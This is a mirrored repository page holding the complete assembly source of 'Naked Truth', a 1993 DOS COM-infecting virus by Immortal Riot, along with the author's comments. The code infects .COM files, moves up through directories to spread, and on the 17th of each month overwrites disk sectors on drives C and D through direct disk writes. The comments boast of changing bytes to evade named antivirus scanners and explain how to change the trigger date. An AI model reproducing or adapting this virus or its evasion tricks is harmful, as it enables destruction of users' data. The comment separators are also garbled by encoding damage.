mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-07 02:45:27 +00:00
245 lines
8.3 KiB
NASM
245 lines
8.3 KiB
NASM
|
; VirusName : Naked Truth
|
|||
|
; Country : Sweden
|
|||
|
; Author : The Unforiven / Immortal Riot
|
|||
|
; Date : 17/09/1993
|
|||
|
;
|
|||
|
; This is a mutation of the virus Born on the Fourth of July
|
|||
|
; This was written by TBSI. Mcafee scan used to find it as the
|
|||
|
; "ash" virus. But I changed on a few bytes, and he's now tricked.
|
|||
|
; Dr Alan Salomon "string" where placed at the beginning
|
|||
|
; of the code, but now he's cheated too..So...enjoy!
|
|||
|
;
|
|||
|
; This is a non-overwriting com infector, it is not resident.
|
|||
|
; It checks which day it is, and if it is the 17:ten the
|
|||
|
; virus will have a redeeming. A redeeming is very nice.
|
|||
|
;
|
|||
|
; This might not be the best mutation, but afterall, it
|
|||
|
; cheats the most common virus scanners. This was born
|
|||
|
; the seventeen of September 1993 (hate all date-names)
|
|||
|
;
|
|||
|
; Scan v108 can't find this, neither can S&S Toolkit 6.54,
|
|||
|
; havn't tried with TBScan/F-Prot, but they will probably
|
|||
|
; identify it as the "ash" virus.
|
|||
|
;
|
|||
|
; Regards : The Unforgiven / Immortal Riot
|
|||
|
|
|||
|
|
|||
|
code segment word public 'code' ;
|
|||
|
assume cs:code,ds:code ; I assume that too :)
|
|||
|
org 100h ;
|
|||
|
|
|||
|
main proc;edure ; Old pascal coder ?
|
|||
|
|
|||
|
|
|||
|
TITLE Naked Truth ;Mutation Name...
|
|||
|
TOF: ;Top-Of-File
|
|||
|
jmp short begin ;Skip over program
|
|||
|
NOP ;Reserve 3rd byte
|
|||
|
EOFMARK: db 26 ;Disable DOS's TYPE
|
|||
|
DB 0 ; <- S&S Toolkit "String-Cheater".
|
|||
|
|
|||
|
first_four: nop ;First run copy only!
|
|||
|
address: int 20h ;First run copy only!
|
|||
|
check: nop ;First run copy only!
|
|||
|
begin: call nextline ;Push BP onto stack
|
|||
|
nextline: pop bp ;BP=location of Skip
|
|||
|
sub bp,offset nextline ;BP=offset from 1st run
|
|||
|
|
|||
|
mov byte ptr [bp+offset infected],0
|
|||
|
;Reset infection count
|
|||
|
|
|||
|
lea si,[bp+offset first_four] ;Original first 4 bytes
|
|||
|
mov di,offset tof ;TOF never changes
|
|||
|
mov cx,4 ;Lets copy 4 bytes
|
|||
|
cld ;Read left-to-right
|
|||
|
rep movsb ;Copy the 4 bytes
|
|||
|
|
|||
|
mov ah,1Ah ;Set DTA address ...
|
|||
|
lea dx,[bp+offset DTA] ; ... to *our* DTA
|
|||
|
int 21h ;Call DOS to set DTA
|
|||
|
|
|||
|
mov ah,4Eh ;Find First ASCIIZ
|
|||
|
lea dx,[bp+offset immortal] ;DS:DX -} '*.COM',0
|
|||
|
lea si,[bp+offset filename] ;Point to file
|
|||
|
push dx ;Save DX
|
|||
|
jmp short continue ;Continue...
|
|||
|
|
|||
|
return:
|
|||
|
mov ah,1ah ;Set DTA address ...
|
|||
|
mov dx,80h ; ... to default DTA
|
|||
|
int 21h ;Call DOS to set DTA
|
|||
|
xor ax,ax ;AX= 0
|
|||
|
mov bx,ax ;BX= 0
|
|||
|
mov cx,ax ;CX= 0
|
|||
|
mov dx,ax ;DX= 0
|
|||
|
mov si,ax ;SI= 0
|
|||
|
mov di,ax ;DI= 0
|
|||
|
mov sp,0FFFEh ;SP= 0
|
|||
|
mov bp,100h ;BP= 100h (RETurn addr)
|
|||
|
push bp ; Put on stack
|
|||
|
mov bp,ax ;BP= 0
|
|||
|
ret ;JMP to 100h
|
|||
|
|
|||
|
nextfile: or bx,bx ;Did we open the file?
|
|||
|
jz skipclose ;No, so don't close it
|
|||
|
mov ah,3Eh ;Close file
|
|||
|
int 21h ;Call DOS to close it
|
|||
|
xor bx,bx ;Set BX back to 0
|
|||
|
skipclose: mov ah,4Fh ;Find Next ASCIIZ
|
|||
|
|
|||
|
continue: pop dx ;Restore DX
|
|||
|
push dx ;Re-save DX
|
|||
|
xor cx,cx ;CX= 0
|
|||
|
xor bx,bx
|
|||
|
int 21h ;Find First/Next
|
|||
|
jnc skipjmp
|
|||
|
jmp NoneLeft ;Out of files
|
|||
|
|
|||
|
skipjmp: mov ax,3D02h ;open file
|
|||
|
mov dx,si ;point to filespec
|
|||
|
int 21h ;Call DOS to open file
|
|||
|
jc nextfile ;Next file if error
|
|||
|
|
|||
|
mov bx,ax ;get the handle
|
|||
|
mov ah,3Fh ;Read from file
|
|||
|
mov cx,4 ;Read 4 bytes
|
|||
|
lea dx,[bp+offset first_four] ;Read in the first 4
|
|||
|
int 21h ;Call DOS to read
|
|||
|
|
|||
|
cmp byte ptr [bp+offset check],26 ;Already infected?
|
|||
|
je nextfile ;Yep, try again
|
|||
|
cmp byte ptr [bp+offset first_four],77 ;
|
|||
|
je nextfile ;
|
|||
|
|
|||
|
mov ax,4202h ;LSeek to EOF
|
|||
|
xor cx,cx ;CX= 0
|
|||
|
xor dx,dx ;DX= 0
|
|||
|
int 21h ;Call DOS to LSeek
|
|||
|
|
|||
|
cmp ax,0FD00h ;Longer than 63K?
|
|||
|
ja nextfile ;Yep, try again...
|
|||
|
mov [bp+offset addr],ax ;Save call location
|
|||
|
|
|||
|
mov ah,40h ;Write to file
|
|||
|
mov cx,4 ;Write 4 bytes
|
|||
|
lea dx,[bp+offset first_four] ;Point to buffer
|
|||
|
int 21h ;Save the first 4 bytes
|
|||
|
|
|||
|
mov ah,40h ;Write to file
|
|||
|
mov cx,offset eof-offset begin ;Length of target code
|
|||
|
lea dx,[bp+offset begin] ;Point to virus start
|
|||
|
int 21h ;Append the virus
|
|||
|
|
|||
|
mov ax,4200h ;LSeek to TOF
|
|||
|
xor cx,cx ;CX= 0
|
|||
|
xor dx,dx ;DX= 0
|
|||
|
int 21h ;Call DOS to LSeek
|
|||
|
|
|||
|
mov ax,[bp+offset addr] ;Retrieve location
|
|||
|
inc ax ;Adjust location
|
|||
|
|
|||
|
mov [bp+offset address],ax ;address to call
|
|||
|
mov byte ptr [bp+offset first_four],0E9h ;JMP rel16
|
|||
|
mov byte ptr [bp+offset check],26 ;EOFMARK
|
|||
|
|
|||
|
mov ah,40h ;Write to file
|
|||
|
mov cx,4 ;Write 4 bytes
|
|||
|
lea dx,[bp+offset first_four] ;4 bytes are at DX
|
|||
|
int 21h ;Write to file
|
|||
|
|
|||
|
inc byte ptr [bp+offset infected] ;increment counter
|
|||
|
jmp nextfile ;Any more?
|
|||
|
|
|||
|
NoneLeft: cmp byte ptr [bp+offset infected],2 ;2 infected
|
|||
|
jae TheEnd ;Party over!
|
|||
|
mov di,100h ;DI= 100h
|
|||
|
cmp word ptr [di],20CDh ;an INT 20h?
|
|||
|
je daycheck ;je daycheck
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
; Here instead of "JE" to theend here, jump to Daycheck, and if the day
|
|||
|
; isn't the 17:ten, just continue to theend, but if it is, have phun...
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
lea dx,[bp+offset riot] ;dot-dot method..
|
|||
|
; MOV DX,OFFSET RIOT ;shitty liner..
|
|||
|
mov ah,3Bh ;Set current directory
|
|||
|
int 21h ;CHDIR ..
|
|||
|
jc TheEnd ;We're through!
|
|||
|
mov ah,4Eh ;check for first com
|
|||
|
jmp continue ;Start over in new dir
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
; If you want to get a redeeming on some special month, just look at the
|
|||
|
; call to daycheck at "nonleft" and the call to daycheck. Change the call
|
|||
|
; to monthcheck, and "delete" the ";" on procedure monthcheck. But
|
|||
|
; remember, that makes, the virus much less destructive, and by that time,
|
|||
|
; all scanners has probably added a new scan-string on this one. Now it will
|
|||
|
; go off the 17:th every month. Feel free to modify this date as much you
|
|||
|
; want to.
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D>-<2D><>-
|
|||
|
; monthcheck: ; check what month it is..
|
|||
|
; mov ah,2ah ;
|
|||
|
; int 21h ; dos to your service..
|
|||
|
; cmp dh,10 ; check if month 10..
|
|||
|
; je daycheck ; if yes jump to day check
|
|||
|
; jmp theend ; otherwise jump to theend.
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
DAYCHECK: ; Check what day it is..
|
|||
|
mov ah,2ah ;
|
|||
|
int 21h ; Dos to your service..
|
|||
|
cmp dl,17 ; Check if it's the forbidden night..
|
|||
|
je redeeming ; If yes, have a great fuck..
|
|||
|
jmp theend ; Otherwise jump to theend
|
|||
|
|
|||
|
REDEEMING: ; Havi'n such a great fuck..
|
|||
|
cli ; Cleaning all interrupts..>
|
|||
|
mov ah,2 ; Starting with drive C
|
|||
|
cwd ; Starting it from 0
|
|||
|
mov cx,0100h ; Continue to 256
|
|||
|
int 026h ; Direct disk-write
|
|||
|
jmp KARO ; Jump For Joy..(J4J)..
|
|||
|
|
|||
|
KARO: ; Yet another..
|
|||
|
CLI ; No law-breakers here!
|
|||
|
MOV AL,3 ; Set to fry drive D
|
|||
|
MOV CX,700 ; Set to write 700 sectors
|
|||
|
MOV DX,00 ; Starting at sector 0
|
|||
|
MOV DS,[DI+99] ; Put random crap in DS
|
|||
|
MOV BX,[DI+55] ; More crap in BX
|
|||
|
CALL REDEEMING ; Start it all over..
|
|||
|
|
|||
|
TheEnd: jmp return ; Getting a gold medal ?
|
|||
|
|
|||
|
Immortal: db '*.COM',0 ;File Specification
|
|||
|
Riot: db '..',0 ;'Dot-Dot'
|
|||
|
|
|||
|
MutationName: db " Naked Truth! "
|
|||
|
Sizefilling: db " Hi-Tech Assasins - Ready To Take On The World "
|
|||
|
morefilling: db " // DEATH TO ALL - PEACE AT LAST // "
|
|||
|
Copyleft: db ' The Unforgiven / Immortal Riot '
|
|||
|
|
|||
|
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
; None of this information is included in the virus's code. It is only
|
|||
|
; used during the search/infect routines and it is not necessary to pre-
|
|||
|
; serve it in between calls to them.
|
|||
|
; <20><>-<2D><><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>--<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>----<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD><EFBFBD>-<2D><><EFBFBD><EFBFBD>-
|
|||
|
|
|||
|
EOF: ;End Of File..
|
|||
|
DTA: db 21 dup (?) ;internal search's data
|
|||
|
|
|||
|
attribute db ? ;attribute
|
|||
|
file_time db 2 dup (?) ;file's time stamp
|
|||
|
file_date db 2 dup (?) ;file's date stamp
|
|||
|
file_size db 4 dup (?) ;file's size
|
|||
|
filename db 13 dup (?) ;filename
|
|||
|
|
|||
|
infected db ? ;infection count
|
|||
|
|
|||
|
addr dw ? ;Address
|
|||
|
|
|||
|
main endp;rocedure
|
|||
|
code ends;egment
|
|||
|
|
|||
|
end main
|
|||
|
|
|||
|
; Greets goes out to : Raver, Metal Militia, Scavenger
|
|||
|
; and all other hi-tech assasins all over the world...
|